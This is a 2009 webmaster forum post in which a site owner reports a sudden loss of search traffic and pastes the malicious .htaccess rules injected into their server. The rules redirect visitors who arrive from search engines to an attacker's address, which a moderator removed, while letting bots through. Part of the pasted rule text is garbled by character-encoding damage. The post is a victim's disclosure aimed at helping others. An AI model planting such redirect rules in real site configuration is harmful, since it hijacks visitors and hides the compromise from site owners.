If you suddenly find your traffic dropping over 90% and upon investigating find out that - Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referals from a non-search engine site?
Well that's what happened to me.
Upon investigating, I found out the following was added to my .htaccess file:
RewriteCond %{HTTP_REFERER} ^.*(google\.妃sn\.奸ive\.com尖ahoo\.地ltavista\.地ol\.地sk\.圯ureka\.com奸ycos\.com多otbot\.com夷nfoseek\.com安ebcrawler\.圯xcite\.好etscape\.com妃amma\.com地lltheweb\.com好orthernlight\.com字ambler\.ru地port\.ru尖andex\.ru如ingwin\.ru安ww\.ru如unto\.ru存earch\.comcast\.net地bcsok\.no妃yspace\.com奸ooksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]
RewriteCond %{HTTP_USER_AGENT} ^.*(bot守rp妃sn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>
My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)
I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.
I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.
It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.
I have asked my host to scan the server for rootkits and I changed my ftp password.
I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.
[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]
[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]
